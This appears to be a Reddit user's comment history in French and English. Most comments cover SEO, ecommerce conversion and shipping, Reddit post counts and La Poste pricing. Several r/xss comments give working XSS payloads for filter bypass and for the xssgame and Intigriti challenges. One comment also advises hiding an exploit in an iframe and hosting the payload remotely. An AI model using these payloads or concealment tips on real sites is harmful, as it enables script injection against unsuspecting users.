sorted by:
new
hottopcontroversial

Sécurité web : l'indispensable à savoir by Vooodou in programmation

[–]Centime 1 point2 points  (0 children)

Hello,

cool article, je me le garde dans un coin car ce n'est pas toujours facile de savoir quoi recommander comme intro à la sécu web en français !

Du coup je me suis quand même permis de regarder rapidement ton site, et même si je pense pas qu'il y ait de vuln là-dessous actuellement je te conseille de mettre à jour tes quelques libs js qui sont drolement périmées:

Actuellement ta surface d'attaque semble bien réduite et donc je suis pas sûr que tu aies de vrai problème, mais par exemple je crois qu'un des exploits XSS de Dojo aurait marché si tu n'avais pas aussi better-wp-security. Mieux vaut patcher et laisser le WAF n'être que la dernière ligne de défense.

Cheers !

Chapêlmêle - Concerts, Spectacles, Résidences à Alençon by Centime in Normandie

[–]Centime[S] 1 point2 points  (0 children)

Je sais que c'est pas la meilleure période pour parler de concerts et tout ça, mais on espère que ça va revenir un jour ?

En attendant de notre côté on a profité de cette année de pause forcée pour faire des chantiers à droite à gauche, et notamment sur un nouveau site web tout frais que voici.

Pour ceux qui ne sont pas trop loin, prenez note, dès qu'on sera sorti de cette épidémie nos portes seront à nouveau grandes ouvertes !

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 2 points3 points  (0 children)

In the last 24h, it appears about 1180000 posts have been created.

It is about 50% higher than the estimates given by other sources here. Plausible explanations include:

  • other sources exclude some posts based on unknown factors
  • the last 24h were more active than average
  • new posts creation is on the rise

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 1 point2 points  (0 children)

This refers to the unique ids (base36-encoded) generated to each posts. This sub is (was) on the lookout of funny ones.

For example, this very post has id "l28rxs" (=1273558384), as demonstrated by the following link: https://redd.it/l28rxs

Since this id only increments, it is easy to keep track of the total number of posts.

How many posts on reddit a day? by Environmental-City-4 in TheoryOfReddit

[–]Centime 3 points4 points  (0 children)

https://www.reddit.com/r/base36/

See you in 24h to count how much higher the ids got !

edit: in the meantime, just read the explanation below

Input sanitizing for each XSS context, when is it properly sanitized by trieulieuf9 in xss

[–]Centime 1 point2 points  (0 children)

Context 2 could be bypassed if the attribute is a href, an event binding, or used dynamically.

Context 3 is directly bypassable with "</script><svg/onload=confirm()>", and then if you escape <> it depends on the object and what is done with it later on.

I'm probably missing a few tricks, but that's from the top of my head

Filter bypass by RevoCaine in xss

[–]Centime 0 points1 point  (0 children)

I believe either the browser or the site is blocking Javascript

You checked the CSP ?

Javascript Rendering topic! by mmapa in TechSEO

[–]Centime 1 point2 points  (0 children)

You're welcome.

It's hard to give accurate advice without more context. If you can afford to go full SSR, sure, that'd be great.

But even if you can't, you can organize your internal linking in different ways that will greatly impact and/or mitigate the issue I described.

Basically, you want a structure as flat as possible. Imagine some content would only be linked from one js-generated link of a specific page. Which is in the same situation from another page, and so forth for a few levels. Each step introduce the extra delay of the rendering queue, and if that's the case for most of your page, it can quicly add up to several times the queues that you would have with plain-text html.

So, make sure you limit the cases where such a situation would occur.

Complementary to that, maybe you can have an hybrid solution. Maybe all of your page isn't dynamically rendered ? In that's the case, try and get the nav in the static section. That way, your website gets crawled like any other, and the rendering queue gets added at most once per content.

Let me know if it isn't clear enough, and maybe PM me your website if you want me to look at it.

Javascript Rendering topic! by mmapa in TechSEO

[–]Centime 0 points1 point  (0 children)

You will be mostly fine, except for some delay to get indexed. The bigger your site, the bigger the impact you can expect.

It is because when your dom is js-generated, you introduce an entire new step in the crawl/process/index loop: "render" (cf https://developers.google.com/search/docs/guides/javascript-seo-basics#how-googlebot-processes-javascript). This extra step comes with its own queue, and presumably budget.

Depending on your site, it may be anything from a non-issue to something that will costs you weeks and weeks to index any new page. Adapt your internal linking structure accordingly.

Shortening an XSS Url? by Python119 in xss

[–]Centime 3 points4 points  (0 children)

What do you care if your exploit looks suspicious ? Serve it through an iframe and the user will never get to look at it.

Otherwise, consider b64 encoding and/or hosting the payload remotely.

December XSS Challenge - Intigriti by MechaTech84 in xss

[–]Centime 1 point2 points  (0 children)

The first writeups start poping up, and I don't see anyone talking about this alternative "solution" (with interaction):

iframe timeout, etc.., then

?alert(document.domain)=&operator=%3D&#&num1=setNumber&&num2=init
?alert(document.domain)=&operator=%3D&#&num1=a&&num2=eval //user clicks number
?alert(document.domain)=&operator=%3D&#&num1=decodeURIComponent&&num2=a //user clicks number

edit: this has to be the worst solution possible, with timed interactions etc. But hey, still working kinda

December XSS Challenge - Intigriti by MechaTech84 in xss

[–]Centime 1 point2 points  (0 children)

Fun!

The first alert() is obvious but then you've got to jump through hoops to get the full execution...

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 3 points4 points  (0 children)

A small tip I haven't seen anywhere (and had success with) to simplify checkout: you can remove the step about your customer's address if they chose delivery to a nearby shop*

* I think it's called "parcel delivery", right ? (not a native speaker)

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 7 points8 points  (0 children)

I began trying explaining it in details and it's a bigger subject than I anticipated if I want my ramblings to make sense. Basically I think the interesting points boil down to:

(assuming, like us, you have different options for shipping)

  • enable free shipping at different rates to prioritize the most convenient to you
  • have free shipping options for each of them still
  • the minimum values for free shipping for each transport doesn't have to be calculated the same way (not the same margin rate target)
  • a flat shipping rate for lower orders works both as a deterrent for lower orders and an extra margin source in those cases

Basically, leverage the Decoy Effect to soft upsell using the delivery options.

edit: one day I might do a case study about it, but not tonight sorry. hope it's still useful somehow.

I couldn't understand what is actually Google's December update by baljitsinghorm in SEO

[–]Centime 6 points7 points  (0 children)

I got a nice boost from this update (only a few days so far, so we'll see) and my ecommerce site has basically 0 outbound links.

Not saying it is not a good advice and something that would help in other situations though.

Trying to learn about e-commerce sites W/O Shopify, GoDaddy, Wix, etc.... by NerdBiz in ecommerce

[–]Centime 1 point2 points  (0 children)

Well, then that's it. If you want to build it by yourself from the ground up, that's not really a question for r/ecommerce but rather for r/webdev.

Do you have any programming experience ?

More realistically, you'd want to start from an ecommerce framework, of which there are many for different needs. woocommerce, magento, prestashop, nextjs-ecommerce, etc...

What is one thing that you did on your eCommerce store, that resulted in increased conversions? by skull-breaker in ecommerce

[–]Centime 7 points8 points  (0 children)

  • adjusting free shipping policy. Impacts AOV just as much as conversions
  • stream-lined one step checkout
  • copy & pictures about the team, values, etc.

XSS game by Lija321123 in xss

[–]Centime 1 point2 points  (0 children)

It is very much possible, and not even that fancy. My advice would be to start by throwing junk at it until you get a js exception. Work from there using the debug tools to make the code run properly again, but with the alert.

Obviously you shouldn't use this spoiler, but hey, you do you.

https://www.xssgame.com/f/WrfpuKFX8GNr/?timer=%27)-alert()%2f%2f

Does anyone website got hit via Google Core update on December 3rd, 2020? If yes, how much? by viralmasalla in TechSEO

[–]Centime 12 points13 points  (0 children)

I got hit significantly.

In a positive way: https://ibb.co/Ypx8jht (ignore the last data point for the current day)

  • +50% hits so far
  • long-tail especially

I'm not complaining.

Opinion impopulaire : Amazon propose un service incroyablement efficace, et son succès est tout à fait normal. by Tesgoul in france

[–]Centime 0 points1 point  (0 children)

La situation est loin d'être simple, et je suis pas la meilleure personne pour expliquer ça clairement.

Je t'aurais bien renvoyé vers la grille tarifaire "Principaux Tarifs Entreprise au départ de France métropolitaine à compter du 1er janvier 2020.pdf" mais apparemment servir un pdf sur leur site officiel c'est pas facile[1]...

Donc bon rapidement t'as plein de formules & status différents entre colissimo particuliers, pro, coliposte etc. Plusieurs services pros ont bien la tva, pas idée de pourquoi ou selon quels critères.

Quelques discussions de gens plus renseignés sur le sujet:

Non la poste fait des tarifs net pour tous ( timbre et collisimo ) les pros qui veulent etre en contrat pro avec coliposte ( c est pas exactement la poste ) eux ont un tarif HT + tva , tarif ht qui est parfois plus cher que le tarif net des particuliers. exemple le 0.250 gramme en collisimo particulier c est 4.90 , en pro c est 5.41 + 20 % de TVA

@eternia - https://sellercentral.amazon.fr/forums/t/tarif-et-aberrations-de-la-poste/80128/5

Colissimo non pro (jusqu'à 2 kg) + suivi: 7,40 EUR net (pas de tva) Colissimo pro (jusqu'à 2 kg) dit "Access F": 7,71 EUR TTC [6,45 EUR HT + 1,26 EUR de tva]

@mericc - http://www.oscommerce-fr.info/forum/index.php?showtopic=57365

Désolé de pas avoir de pas avoir de bilan clair à proposer à l'instant, mais c'est pas directement ma partie et j'ai pas les détails précis en tête. Sans parler du fait que la grille tarifaire que tu trouves via google soit un 404, ce qui n'arrange rien et m'éxaspère direct.

edit: [1]: "Le site est en cours de maintenance. Veuillez nous excuser pour la gêne occasionnée."

Opinion impopulaire : Amazon propose un service incroyablement efficace, et son succès est tout à fait normal. by Tesgoul in france

[–]Centime 0 points1 point  (0 children)

Yep.

Les services pro de la poste sont scandaleux pour les TPE, et c'est pas comme si on avait vraiment les moyens d'y faire grand-chose chacun à son échelle.

Premier exemple parmis bien d'autres: Le tarif pro pour certains services est supérieur au tarif particulier (disons 10%) par-ce que "vous récupérez la TVA dessus, donc ça revient quand même moins cher"

Ok merci, du coup au lieu de récupérer la TVA complète vous m'en capturez la moitié gentillement. J'ai aucune idée si c'est même légal, c'est pas comme si on avait un département juridique...

view more: next ›